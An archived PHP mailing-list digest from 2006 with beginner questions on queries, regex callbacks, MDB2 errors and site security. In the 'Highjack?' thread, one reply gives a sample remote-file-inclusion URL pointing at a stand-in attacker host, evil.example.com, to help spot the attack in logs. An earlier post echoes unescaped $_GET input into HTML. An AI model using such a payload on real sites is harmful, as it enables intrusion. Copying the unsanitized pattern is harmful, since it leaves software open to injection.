php-general Digest 13 Nov 2006 17:56:39 -0000 Issue 4457
Topics (messages 244543 through 244560):
one click - two actions?
244543 by: Mel
244545 by: John Meyer
Re: Parsing brackets in text
244544 by: Roman Neuhauser
244547 by: Dotan Cohen
244551 by: Roman Neuhauser
Re: Mysql strategy
244546 by: Dotan Cohen
244558 by: Dotan Cohen
Re: How do you do the ? mark after a filename
244548 by: Ivo F.A.C. Fokkema
server side security
244549 by: H. Dan Phillips
Highjack?
244550 by: tedd
244559 by: Eric Butera
244560 by: bruce
DOM Validation using PHP
244552 by: Raphael Martins
Re: problem with imagestring()
244553 by: Piotr Sulecki
MDB2 : never ending story
244554 by: Alain Roger
244555 by: Paul Scott
244556 by: Alain Roger
244557 by: Paul Scott
Administrivia:
To subscribe to the digest, e-mail:
[EMAIL PROTECTED]
To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]
To post to the list, e-mail:
php-general@lists.php.net
----------------------------------------------------------------------
--- Begin Message ---
Could someone please help me figure out how to show some description
(where applicable) at the same time as I show an image, when I click
on a link, without repeating the entire query?
The image and the description are both in the same table in my database.
I now show the image when I click on the link which is good, but the
description stays on at all times instead of appearing only when active.
http://www.squareinch.net/single_page.php
This is the code I have for the image area:
/* query 1 from client */
$query = "SELECT * FROM client
where status='active' or status='old'
order by companyName";
$result = mysql_query($query)
or die ("Couldn't execute query");
while ($aaa = mysql_fetch_array($result,MYSQL_ASSOC))
{
echo "<span class='navCompany'>{$aaa['companyName']}</span><span
class='navArrow'> > </span>\n";
/* query 2 from job */
$query = "SELECT * FROM job
WHERE companyId='{$aaa['companyId']}'";
$result2 = mysql_query($query)
or die ("Couldn't execute query2");
foreach($aaa as $jobType)
{
$bbb = mysql_fetch_array($result2,MYSQL_ASSOC);
echo "<span class='navText'><a href='single_page.php?art=".$bbb
['pix']."'>{$bbb['jobType']}</a></span>\n";
}
echo "<br>";
}
?>
</div>
<div class="navbox3"><?php $image = $_GET['art']; ?>
<img src="images/<?php print ($image) ?>" alt="Portfolio Item"
border="0" width="285" height="285"></div>
This is the code I have for the description area:
/* query 1 from client */
$query = "SELECT * FROM client
where status='active' or status='old'
order by companyName";
$result = mysql_query($query)
or die ("Couldn't execute query");
while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
{
/* query 2 from job */
$query = "SELECT * FROM job
WHERE companyId='{$row['companyId']}'";
$result2 = mysql_query($query)
or die ("Couldn't execute query2");
$url = mysql_query($result2);
foreach($row as $url)
{
$row = mysql_fetch_array($result2,MYSQL_ASSOC);
if ("url={$row['url']}")
echo "<span class='navText'><a href='{$row['url']}'>{$row['web']}</
a></span>";
}
echo "<br>";
}
?>
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Not to be rude or anything, but if you want to do two things with one
click, wouldn't the javascript list be the place you would want to go?
Mel wrote:
> Could someone please help me figure out how to show some description
> (where applicable) at the same time as I show an image, when I click on
> a link, without repeating the entire query?
> The image and the description are both in the same table in my database.
>
> I now show the image when I click on the link which is good, but the
> description stays on at all times instead of appearing only when active.
>
> http://www.squareinch.net/single_page.php
>
> This is the code I have for the image area:
> /* query 1 from client */
> $query = "SELECT * FROM client
> where status='active' or status='old'
> order by companyName";
>
> $result = mysql_query($query)
> or die ("Couldn't execute query");
>
> while ($aaa = mysql_fetch_array($result,MYSQL_ASSOC))
> {
> echo "<span class='navCompany'>{$aaa['companyName']}</span><span
> class='navArrow'> > </span>\n";
>
> /* query 2 from job */
> $query = "SELECT * FROM job
> WHERE companyId='{$aaa['companyId']}'";
> $result2 = mysql_query($query)
> or die ("Couldn't execute query2");
>
> foreach($aaa as $jobType)
> {
> $bbb = mysql_fetch_array($result2,MYSQL_ASSOC);
> echo "<span class='navText'><a
> href='single_page.php?art=".$bbb['pix']."'>{$bbb['jobType']}</a></span>\n";
> }
> echo "<br>";
> }
> ?>
>
> </div>
>
>
> <div class="navbox3"><?php $image = $_GET['art']; ?>
> <img src="images/<?php print ($image) ?>" alt="Portfolio
> Item" border="0" width="285" height="285"></div>
>
>
> This is the code I have for the description area:
>
> /* query 1 from client */
> $query = "SELECT * FROM client
> where status='active' or status='old'
> order by companyName";
>
> $result = mysql_query($query)
> or die ("Couldn't execute query");
>
> while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
> {
>
> /* query 2 from job */
> $query = "SELECT * FROM job
> WHERE companyId='{$row['companyId']}'";
> $result2 = mysql_query($query)
> or die ("Couldn't execute query2");
> $url = mysql_query($result2);
>
> foreach($row as $url)
> {
> $row = mysql_fetch_array($result2,MYSQL_ASSOC);
> if ("url={$row['url']}")
> echo "<span class='navText'><a
> href='{$row['url']}'>{$row['web']}</a></span>";
> }
>
> echo "<br>";
> }
> ?>
>
>
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org
iD8DBQFFWGE2bHd4gglFmoARAnNWAJ0fs+NHm5MbNwDpm3E7Flu3giU+LQCgkF7O
uCu6zhUFfviNC+aaxpNy+Vg=
=NQVC
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
# [EMAIL PROTECTED] / 2006-11-13 01:35:44 +0200:
> On 13/11/06, Chris <[EMAIL PROTECTED]> wrote:
> >
> ><?php
> >function makeLink($matches) {
> > $returnString="<b>" . $matches[1] . "</b>";
> > return $returnString;
> >}
> >
> >$articleText="This is a very [long] string.";
> >$articleText=preg_replace_callback('/\[([a-z]+)\]/i' , "makeLink",
> >$articleText);
> >print $articleText . "\n";
> >?>
> >
> >
> >The callback takes whatever the regular expressions returns (alpha
> >characters between [ and ]) and runs it through function "makeLink".
> >
> >Not sure how that will go with multiple []'s etc in the same string but
> >it should get you started.
> >
>
> I didn't know that I had to call the function like that- I don't
> remember ever seeing it called that way.
It's done this way in all the examples on
http://cz.php.net/manual/en/function.preg-replace-callback.php
What documentation did you read?
> Also, I must google the meaning of the (~+) in the regex.
No need to google:
http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php
Skip the Differences From Perl section.
--
How many Vietnam vets does it take to screw in a light bulb?
You don't know, man. You don't KNOW.
Cause you weren't THERE. http://bash.org/?255991
--- End Message ---
--- Begin Message ---
On 13/11/06, Roman Neuhauser <[EMAIL PROTECTED]> wrote:
# [EMAIL PROTECTED] / 2006-11-13 01:35:44 +0200:
> On 13/11/06, Chris <[EMAIL PROTECTED]> wrote:
> >
> ><?php
> >function makeLink($matches) {
> > $returnString="<b>" . $matches[1] . "</b>";
> > return $returnString;
> >}
> >
> >$articleText="This is a very [long] string.";
> >$articleText=preg_replace_callback('/\[([a-z]+)\]/i' , "makeLink",
> >$articleText);
> >print $articleText . "\n";
> >?>
> >
> >
> >The callback takes whatever the regular expressions returns (alpha
> >characters between [ and ]) and runs it through function "makeLink".
> >
> >Not sure how that will go with multiple []'s etc in the same string but
> >it should get you started.
> >
>
> I didn't know that I had to call the function like that- I don't
> remember ever seeing it called that way.
It's done this way in all the examples on
http://cz.php.net/manual/en/function.preg-replace-callback.php
What documentation did you read?
In the first example on that page, it looks to me like it should just
return the text "next_year", and not call that function. Obviously, it
is my misunderstanding of the way that the funciton works, and not in
the function itself. I do learn php from TFM and this list, not from a
course. Just like in any learning environment, I could misinterpret
what is taught to me and need to ask a question, or not even know that
I misinterpreted and not know that I need to ask a question. This is a
case of the latter, clearly, because I have never needed to do
anything other than a simple str_replace until now.
> Also, I must google the meaning of the (~+) in the regex.
No need to google:
http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php
Skip the Differences From Perl section.
That I have read at least three or four times. I still don't capture
all of it, but I try. You are correct, I should have referenced that
right away. It won't hurt for me to read it again, too. Thank you.
Dotan Cohen
--- End Message ---
--- Begin Message ---
# [EMAIL PROTECTED] / 2006-11-13 15:02:53 +0200:
> > http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php
> >
> > Skip the Differences From Perl section.
>
> That I have read at least three or four times. I still don't capture
> all of it, but I try. You are correct, I should have referenced that
> right away. It won't hurt for me to read it again, too. Thank you.
Just keep reading it, but not without trying out various things
yourself. I had hard time hammering it into my head a few years ago,
but it has been paying off like crazy. Your gain might vary.
--
How many Vietnam vets does it take to screw in a light bulb?
You don't know, man. You don't KNOW.
Cause you weren't THERE. http://bash.org/?255991
--- End Message ---
--- Begin Message ---
On 13/11/06, Chris <[EMAIL PROTECTED]> wrote:
Dotan Cohen wrote:
> If I have to perform 30 LIKE searches for different keywords in a
> varchar field, which strategy would be recommended:
> 1) 30 searches, one for each keyword
No. Horribly inefficient.
> 2) To select the varchar field from all the rows, and search through
> them with php's array functions?
No. Make the database do the work.
Use full text indexing:
http://dev.mysql.com/doc/refman/4.1/en/fulltext-search.html
Thanks, Chris, but that approach won't work as I don't know all the
values that I'll be searching for at any one time. In fact, I only
know one of them at a time. This is the makeLink function in another
thread that you helped me in.
However, I do see other use of the full-text search functions in my
future! This looks like it could save me quite a bit of work on
another project.
Dotan Cohen
--- End Message ---
--- Begin Message ---
On 13/11/06, David Tulloh <[EMAIL PROTECTED]> wrote:
Dotan Cohen wrote:
> If I have to perform 30 LIKE searches for different keywords in a
> varchar field, which strategy would be recommended:
> 1) 30 searches, one for each keyword
> 2) To select the varchar field from all the rows, and search through
> them with php's array functions?
It's not going to make a great deal of difference if you do the
processing in the MySQL or the PHP, in this case it's basically the same
operation in each. I suspect that efficiently recreating the LIKE
functionality in PHP wouldn't be trivial to do, if you are just doing
straight comparisons the MySQL STRCMP function should be faster.
If you are worried about the speed of this query I'd suggest rethinking
your database structure. Text field comparisons will always be
relatively slow compared to numeric comparisons or numeric lookups. My
reading of this query however is that it should be 30 OR comparisons, no
joins involved. In this case the query will scale linearly with your
database size so you shouldn't worry too much about it slowing down over
time.
By that do you mean that it is O=n? Yes, it is linear.
It's a matter of knowing if 30 LIKE queries are more efficient than
one big query that brings down three fields (an INT and two VARCHAR's)
for every row in the table. Now that I'm thinking about it, I'm
probably better off with one big query, as it is only one query, and
I'd imagine that flipping through an array 30 times is faster than
making 30 database calls.
Dotan Cohen
http://what-is-what.com/what_is/digg.html
--- End Message ---
--- Begin Message ---
On Sun, 12 Nov 2006 22:02:51 -0700, Thomas Bonham wrote:
> Thank you for that, it was a big help.
>
> Can I also call function that way?
>
> Again thank you for your help.
>
> Thomas
Do you mean:
/index.php?action=search
<?php
if (isset($_GET['action']) && $_GET['action'] == 'search') {
search_items();
} else {
view_all_items();
}
?>
--- End Message ---
--- Begin Message ---
Let me begin by saying I'm a newbie to PHP and open source. I setup a
windows 2003 server with IIS6, PHP 5x and MYSQL5x for one of our
developers to start building a new web based application. The developer
will be using PHP myadmin for his purposes. The settings that were used
were ones posted out on many web sites for this combo. I'm looking for
detailed instructions to secure the server from the standpoint of the
server OS, php.ini and mysql. The developer will be securing access to
the application from his end but I want to make sure that the server
also remain secure. It will only be used within our intra-net and only
by a handful of people. Any and all suggestions will be greatly appreciated.
Thks Dan Phillips
--- End Message ---
--- Begin Message ---
Hi gang:
While this is not an obvious php question, it does deal with security
which is a concern.
Just this morning had a couple of my sites "highjacked". What I found
was someone had replaced my root level index.php with their own
index.php. You can see the result at:
http://xn--u2g.com/index1.php
It was not a terrible loss nor inconvenience, but I wonder how they
did it. Any ideas how this was done and suggestions as to how to
prevent this from happening again?
Thanks,
tedd
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
--- End Message ---
--- Begin Message ---
On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
Hi gang:
While this is not an obvious php question, it does deal with security
which is a concern.
Just this morning had a couple of my sites "highjacked". What I found
was someone had replaced my root level index.php with their own
index.php. You can see the result at:
http://xn--u2g.com/index1.php
It was not a terrible loss nor inconvenience, but I wonder how they
did it. Any ideas how this was done and suggestions as to how to
prevent this from happening again?
Thanks,
tedd
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Tedd,
I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project. I'd say the first thing would be to try and
find any include/require statements that are exploitable. In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.
If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
--- End Message ---
--- Begin Message ---
eric...
you say how embarrasing regaring the $path.'foo'.... i'm curious, why/how is
this simple piece of code exploitable. assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...
thoughts/explanations...
thanks
-----Original Message-----
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?
On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security
> which is a concern.
>
> Just this morning had a couple of my sites "highjacked". What I found
> was someone had replaced my root level index.php with their own
> index.php. You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they
> did it. Any ideas how this was done and suggestions as to how to
> prevent this from happening again?
>
> Thanks,
>
> tedd
>
> --
> -------
> http://sperling.com http://ancientstones.com http://earthstones.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Tedd,
I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project. I'd say the first thing would be to try and
find any include/require statements that are exploitable. In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.
If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--- End Message ---
--- Begin Message ---
Hi there!
I´m building a form validator using PHP and JS. It´s working fine by
now, but I want to make a little improvement. Here is how its working now:
1. The user fill the form. Every time he leaves the field, the JS
code match the value against a regexp to validate.
2. When the user submits the form, the PHP script match all the
values against the same regexp's.
Now, i want to validate my fields to prevent XSS, allowing my html tags
but only the attributes that I want.
I thought something like: (the tags and the valid attributes).
<?php
$form_html_validation = array(
"p"=>array(""),
"a"=>array("href","name","rel"),
"ol"=>array(""),
"ul"=>array(""),
"li"=>array(""),
"h2"=>array(""),
"h3"=>array(""),
"h4"=>array(""),
"h5"=>array(""),
"h6"=>array(""),
"strong"=>array(""),
"em"=>array("")
);
$valid_elements = "<".join("><",array_keys($form_html_validation)).">";
$userInput = strip_tags($userInput,$valid_elements);
//perform DOM Attribute Validation
?>
But I don´t know how to loop over every attribute for each tag in the
DomTree.
Someone has any ideas?
Thank You
--- End Message ---
--- Begin Message ---
Ave!
Forget it. It turned out that the culprit was Debian-specific patch of
libgd2.
Sorry for bothering you.
Regards,
Piotr Sulecki.
--- End Message ---
--- Begin Message ---
Dear all,
i still got the same error when i run this code :
==> Call to a member function fetchRow() on a non-object on line "while
((.... "
so it seems that package MDB2_Driver_pgsql is not loaded or something is
wrong...
i'm really lost...4 days that i work on it without any solution...
$db2 =& MDB2::connect($dsn, $options);
if (PEAR::isError($db2))
{
die("Error connection :
".$db2->getMessage()."<br><br>".$db2->getUserinfo());
}
$res =& $db2->exec($query);
if (PEAR::isError($res))
{
die("Error connection :
".$res->getMessage()."<br><br>".$res->getUserinfo());
}
while (($row = $res->fetchRow()))
{
echo $row[0] . "<br>";
}
--
Alain
------------------------------------
Windows XP SP2
PostgreSQL 8.1.4
Apache 2.0.58
PHP 5
--- End Message ---
--- Begin Message ---
On Mon, 2006-11-13 at 17:49 +0100, Alain Roger wrote:
> Dear all,
>
> i still got the same error when i run this code :
> ==> Call to a member function fetchRow() on a non-object on line "while
Then why not try something else?
Try this:
$db2 =& MDB2::connect($dsn, $options);
if (PEAR::isError($db2))
{
die("Error connection :
".$db2->getMessage()."<br><br>".$db2->getUserinfo());
}
$db2->setLimit($first, $count); //set the first row that you want and
the number of rows after that that you want...
$res = $db2->exec($stmt);
if (PEAR::isError($res)) {
$ret = false;
} else {
.............;
--Paul
All Email originating from UWC is covered by disclaimer
http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm
--- End Message ---
--- Begin Message ---
And therefore how do you want to get the result set ?
nothing is solved now... i still need a fetchrow or fetchOne....
On 11/13/06, Paul Scott <[EMAIL PROTECTED]> wrote:
On Mon, 2006-11-13 at 17:49 +0100, Alain Roger wrote:
> Dear all,
>
> i still got the same error when i run this code :
> ==> Call to a member function fetchRow() on a non-object on line "while
Then why not try something else?
Try this:
$db2 =& MDB2::connect($dsn, $options);
if (PEAR::isError($db2))
{
die("Error connection :
".$db2->getMessage()."<br><br>".$db2->getUserinfo());
}
$db2->setLimit($first, $count); //set the first row that you want and
the number of rows after that that you want...
$res = $db2->exec($stmt);
if (PEAR::isError($res)) {
$ret = false;
} else {
.............;
--Paul
All Email originating from UWC is covered by disclaimer
http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm
--
Alain
------------------------------------
Windows XP SP2
PostgreSQL 8.1.4
Apache 2.0.58
PHP 5
--- End Message ---
--- Begin Message ---
On Mon, 2006-11-13 at 18:07 +0100, Alain Roger wrote:
> And therefore how do you want to get the result set ?
> nothing is solved now... i still need a fetchrow or fetchOne....
Have you read _any_ of the MDB2 docs??
<rant warning>
As far as I can see you have decided not to even _try_ any of the
solutions that people on this list, and others, have given you...
My final advice to you is RTFM and google it.
</rant warning>
--Paul
All Email originating from UWC is covered by disclaimer
http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm
--- End Message ---
